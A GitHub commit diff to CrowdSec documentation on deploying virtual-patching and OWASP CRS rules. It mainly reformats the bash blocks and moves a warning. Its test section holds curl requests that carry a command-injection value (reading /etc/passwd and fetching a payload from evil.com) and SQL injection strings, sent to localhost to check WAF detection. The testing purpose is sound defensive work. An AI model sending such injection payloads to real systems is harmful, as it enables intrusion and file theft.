Skip to content

Commit 3e0f46a

Browse files
author
jdv
committed
nano update to vpatch and crs page
1 parent 9becdaf commit 3e0f46a

File tree

1 file changed

+18
-21
lines changed

1 file changed

+18
-21
lines changed

crowdsec-docs/docs/appsec/vpatch_crs.md

Lines changed: 18 additions & 21 deletions
Original file line numberDiff line numberDiff line change
@@ -18,11 +18,11 @@ This guide shows how to deploy both CrowdSec's virtual patching rules and OWASP
1818

1919
Install both the virtual patching and CRS collections:
2020

21-
```bash
22-
# Install virtual patching rules (in-band blocking)
21+
```bash title="Install virtual patching rules (in-band blocking)"
2322
cscli collections install crowdsecurity/appsec-virtual-patching
23+
```
2424

25-
# Install OWASP CRS rules (out-of-band detection + scenario)
25+
```bash title="Install OWASP CRS rules (out-of-band detection + scenario)
2626
cscli collections install crowdsecurity/appsec-crs
2727
```
2828

@@ -83,29 +83,25 @@ The `crowdsecurity/appsec-crs` collection includes:
8383

8484
Verify that both configurations are loaded:
8585

86-
```bash
87-
# Check AppSec configurations
86+
```bash title="Check AppSec configurations"
8887
cscli appsec-configs list
88+
```
89+
Should show:
90+
- crowdsecurity/appsec-default
91+
- crowdsecurity/crs
8992

90-
# Should show:
91-
# crowdsecurity/appsec-default
92-
# crowdsecurity/crs
93-
94-
# Check scenarios
93+
```bash title="Check scenarios"
9594
cscli scenarios list | grep appsec
96-
97-
# Should show:
98-
# crowdsecurity/crowdsec-appsec-outofband
9995
```
96+
Should show:
97+
- crowdsecurity/crowdsec-appsec-outofband
10098

10199
### Check AppSec Status
102100

103-
```bash
104-
# Check that AppSec is running
101+
```bash title="Check that AppSec is running"
105102
cscli metrics
106-
107-
# Look for appsec metrics in the output
108103
```
104+
*Look for appsec metrics in the output*
109105

110106
## Testing - CrowdSec Vpatch
111107

@@ -119,6 +115,11 @@ curl -I ${TARGET}'/.env'
119115

120116
## Testing - OWASP CRS
121117

118+
:::warning
119+
Those requests are meant to emulate malevolent requests that will be catched by OWASP CRS.
120+
Don't lock yourself out if CrowdSec or any other security rule processor applies a ban uppon the following:
121+
:::
122+
122123
```bash
123124
TARGET=localhost
124125
curl -I ${TARGET}'/?x=A";cat+/etc/passwd;wget+http://evil.com/payload'
@@ -129,10 +130,6 @@ curl -I ${TARGET}'/?x=A"+OR+"1"="1"+union+select+"fooobar","foo'
129130
curl -I ${TARGET}'/?x=A"+OR+"1"="1"+union+select+"fooobar","foo'
130131
```
131132

132-
:::warning
133-
Those requests are meant to emulate malevolent requests that will be catched by OWASP CRS.
134-
:::
135-
136133
Uppon triggering those, you should see in CrowdSec logs:
137134

138135
```bash

0 commit comments

Comments
 (0)